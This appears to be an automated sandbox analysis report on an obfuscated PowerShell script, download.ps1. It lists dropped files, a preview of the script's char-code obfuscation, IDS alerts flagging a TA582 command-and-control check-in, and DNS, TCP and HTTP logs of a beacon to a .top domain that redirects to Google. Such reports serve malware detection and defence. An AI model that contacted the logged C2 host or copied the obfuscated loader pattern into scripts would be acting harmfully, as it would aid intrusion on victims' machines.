                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllul7got/Z:NllUkot
                                                                                          MD5:71995B6B43EA2A2D49079E9E99E8D184
                                                                                          SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                                                                          SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                                                                          SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:@...e................................................@..........

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jswsfyd4.gok.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4j11xlv.b0c.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1ya0vrb.xft.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrxws1yv.e04.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6224
                                                                                          Entropy (8bit):3.7198077928349793
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:oWyj3CkTSkvhkvCCtuiZMceHobZMcxHom:oWyvKuiZNbZEm
                                                                                          MD5:AAA2174C701D4FE5ABD29C1E6AA3855F
                                                                                          SHA1:42B15535D272E4F8441760BCCF98F1C4C851CED1
                                                                                          SHA-256:41F7D4F2A70247DD9E6D8C1640B515C315A30974F7A30DC5BB440AF89D3A9873
                                                                                          SHA-512:F27A32A96904B1530A42A525EEA639D1CF08D147E0BD3816E53436A0F0AB49253B4F12E5FEB105C323BBD910941ABA8A326803E62E62EFB40F3B4470C997A3A6
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. ...J.S........a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...%8...a.......a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z@l...........................^.A.p.p.D.a.t.a...B.V.1.....'Z<l..Roaming.@......EW<2'Z<l..../........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Z9l....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Z9l....2......................d..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Z9l....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Z9l....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'ZAl....u...........

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7RL2YW8C3GOI7S17G7WJ.temp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6224
                                                                                          Entropy (8bit):3.7198077928349793
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:oWyj3CkTSkvhkvCCtuiZMceHobZMcxHom:oWyvKuiZNbZEm
                                                                                          MD5:AAA2174C701D4FE5ABD29C1E6AA3855F
                                                                                          SHA1:42B15535D272E4F8441760BCCF98F1C4C851CED1
                                                                                          SHA-256:41F7D4F2A70247DD9E6D8C1640B515C315A30974F7A30DC5BB440AF89D3A9873
                                                                                          SHA-512:F27A32A96904B1530A42A525EEA639D1CF08D147E0BD3816E53436A0F0AB49253B4F12E5FEB105C323BBD910941ABA8A326803E62E62EFB40F3B4470C997A3A6
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. ...J.S........a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...%8...a.......a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z@l...........................^.A.p.p.D.a.t.a...B.V.1.....'Z<l..Roaming.@......EW<2'Z<l..../........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Z9l....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Z9l....2......................d..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Z9l....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Z9l....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'ZAl....u...........

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:ASCII text, with very long lines (10701), with CRLF line terminators
                                                                                          Entropy (8bit):5.9631506020067
                                                                                          TrID:
                                                                                            File name:download.ps1
                                                                                            File size:19'770 bytes
                                                                                            MD5:6e85589d5b99cc0147e0a2411c974061
                                                                                            SHA1:762c32d847189b201d92f50d641ad751ea90a613
                                                                                            SHA256:de56f2adb28159654d43754aed8f485a3f4808d759103434882f3e9290bfb8dd
                                                                                            SHA512:61a4d14cc3ab65665459ce849982e5a6a0e1616bb49468c0689974fd4db21fbe927f9b23879f07b70bd1e2aeb8f42b824f9107fde5bbcd7dca2f144f7573d542
                                                                                            SSDEEP:384:DDg1fKq9FGEutbLkJE3mhISw40hO6yBz+Iv4ksoDRgKd:XgfJJhaFSBzJpgKd
                                                                                            TLSH:40925CB427C4FDE1C66E4B2E6902FC043A24746FD5E7A8C8AB9995C623A47102F2ED45
                                                                                            File Content Preview:$gwrxbc=$executioncontext;$altionenaresistionbeisined = -join (0..54 | ForEach-Object {[char]([int]"00000000000001230000000000000122000000000000012700000000000001200000000000000126000000000000012400000000000001260000000000000125000000000000012500000000000

                                                                                            File Icon

                                                                                            Icon Hash:3270d6baae77db44

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-07T14:34:07.935887+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.64971045.61.136.13880TCP
                                                                                            2025-01-07T14:34:07.935887+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.64971045.61.136.13880TCP
                                                                                            2025-01-07T14:34:08.572367+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.649711142.250.184.22880TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 7, 2025 14:34:06.961550951 CET4971080192.168.2.645.61.136.138
                                                                                            Jan 7, 2025 14:34:06.966883898 CET804971045.61.136.138192.168.2.6
                                                                                            Jan 7, 2025 14:34:06.966955900 CET4971080192.168.2.645.61.136.138
                                                                                            Jan 7, 2025 14:34:06.971807003 CET4971080192.168.2.645.61.136.138
                                                                                            Jan 7, 2025 14:34:06.976639032 CET804971045.61.136.138192.168.2.6
                                                                                            Jan 7, 2025 14:34:07.881592989 CET804971045.61.136.138192.168.2.6
                                                                                            Jan 7, 2025 14:34:07.892229080 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:07.897109985 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:07.897232056 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:07.897388935 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:07.902254105 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:07.935887098 CET4971080192.168.2.645.61.136.138
                                                                                            Jan 7, 2025 14:34:08.572280884 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572295904 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572307110 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572316885 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572328091 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572336912 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572346926 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572357893 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572369099 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572366953 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.572381020 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.572443008 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.577210903 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.577225924 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.577282906 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.658988953 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.659008980 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.659018993 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.659095049 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.661762953 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.661775112 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.661834002 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.661875010 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.661899090 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.661915064 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.668087006 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.668097973 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.668107986 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.668158054 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.674432039 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.674444914 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.674457073 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.674515009 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.680630922 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.680650949 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.680713892 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.680748940 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.680758953 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.680794954 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.687031984 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.687043905 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.687053919 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.687100887 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.687131882 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.693320990 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.693330050 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.693340063 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.693381071 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.699534893 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.699544907 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.699599981 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.699630976 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.699640989 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.699671030 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.706387043 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.706398964 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.706409931 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.706448078 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.706485987 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.728044987 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.728056908 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.728068113 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.728131056 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.745812893 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.745824099 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.745832920 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.745873928 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.745903969 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.748343945 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.748353958 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.748363018 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.748408079 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.754743099 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.754797935 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.754806042 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.754816055 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.754844904 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.754878044 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.760953903 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.760962963 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.761010885 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.761043072 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.761051893 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.761079073 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.767287970 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767297983 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767338991 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.767365932 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767374039 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767410040 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.773689032 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.775569916 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:09.191668034 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:09.191936016 CET4971080192.168.2.645.61.136.138

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 7, 2025 14:34:06.569744110 CET5788553192.168.2.61.1.1.1
                                                                                            Jan 7, 2025 14:34:06.950231075 CET53578851.1.1.1192.168.2.6
                                                                                            Jan 7, 2025 14:34:07.882790089 CET6244753192.168.2.61.1.1.1
                                                                                            Jan 7, 2025 14:34:07.890132904 CET53624471.1.1.1192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 7, 2025 14:34:06.569744110 CET192.168.2.61.1.1.10x960dStandard query (0)jjdgdeffjimfgne.topA (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 14:34:07.882790089 CET192.168.2.61.1.1.10x8d98Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 7, 2025 14:34:06.950231075 CET1.1.1.1192.168.2.60x960dNo error (0)jjdgdeffjimfgne.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 14:34:07.890132904 CET1.1.1.1192.168.2.60x8d98No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • jjdgdeffjimfgne.top
                                                                                            • www.google.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.64971045.61.136.138805032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 7, 2025 14:34:06.971807003 CET219OUTGET /4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                            Host: jjdgdeffjimfgne.top
                                                                                            Connection: Keep-Alive
                                                                                            Jan 7, 2025 14:34:07.881592989 CET166INHTTP/1.1 302 Found
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Tue, 07 Jan 2025 13:34:07 GMT
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Location: http://www.google.com


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.649711142.250.184.228805032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 7, 2025 14:34:07.897388935 CET159OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                            Host: www.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Jan 7, 2025 14:34:08.572280884 CET1236INHTTP/1.1 200 OK
                                                                                            Date: Tue, 07 Jan 2025 13:34:08 GMT
                                                                                            Expires: -1
                                                                                            Cache-Control: private, max-age=0
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bTruN53NTWSnIKw-k4Mkeg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: AEC=AZ6Zc-Wi2aiGyXAIiDKpvWjVhwEwy-KtMxQXFCtvPxnnrIRTZFgkLO4UCYM; expires=Sun, 06-Jul-2025 13:34:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            Set-Cookie: NID=520=IsTjCglPKOLjpssG3Eh7EjYiVM2px1Tv2Ba0nHi0_pm8uN7OihyUy95NleU7IHNrk-xc1_o-VPMDj3f1Bgm4FYvcxTp4suFieitnZlLl2TEyT1Zm6jvBBVBUbXKAQMhYqwihrSlGcXYFHVUsJW2XBtdkNiOJPQFJziEiWY21PLmY6iktpDD3ma6k7WWhG01nVEJiZ7t79w; expires=Wed, 09-Jul-2025 13:34:08 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Transfer-Encoding: chunked
                                                                                            Data Raw: 35 34 35 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                            Data Ascii: 5454<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                            Jan 7, 2025 14:34:08.572295904 CET1236INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                            Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
                                                                                            Jan 7, 2025 14:34:08.572307110 CET1236INData Raw: 39 2c 38 2c 37 2c 31 2c 39 30 31 2c 34 31 34 2c 35 33 35 2c 36 31 2c 32 30 34 2c 32 38 36 2c 36 34 36 2c 34 30 2c 36 2c 33 34 38 2c 37 30 35 2c 33 2c 32 35 35 2c 31 32 36 2c 32 36 37 2c 32 2c 35 30 33 2c 36 34 32 2c 39 33 2c 32 36 37 2c 31 2c 35
                                                                                            Data Ascii: 9,8,7,1,901,414,535,61,204,286,646,40,6,348,705,3,255,126,267,2,503,642,93,267,1,525,368,315,1,268,32,466,2,1083,390,277,527,1368,2,165,94,65,22,1362,5,921,136,545,884,23,638,48,23,399,8,213,3,11,452,41,1298,64,3,249,259,152,243,118,686,2,3,23
                                                                                            Jan 7, 2025 14:34:08.572316885 CET1236INData Raw: 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 67 2e 5f 63 73 68 69 64 26 26 66 26 26 28 63 2b 3d 22 26 63 73 68 69 64 3d 22 2b 67 2e 5f 63 73 68 69 64 29 3b 28 64 3d 64 28 29 29 26 26 28 63 2b 3d 22 26 6f 70 69 3d 22 2b 64 29 3b 72 65 74 75 72 6e 22
                                                                                            Data Ascii: ().toString();g._cshid&&f&&(c+="&cshid="+g._cshid);(d=d())&&(c+="&opi="+d);return"/"+(h||"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,
                                                                                            Jan 7, 2025 14:34:08.572328091 CET1236INData Raw: 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 63 3d 3d 3d 22 31 22 7c 7c 63 3d 3d 3d 22 71 22 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65
                                                                                            Data Ascii: ta-submitfalse");a=c==="1"||c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a
                                                                                            Jan 7, 2025 14:34:08.572336912 CET1120INData Raw: 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69
                                                                                            Data Ascii: (opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:
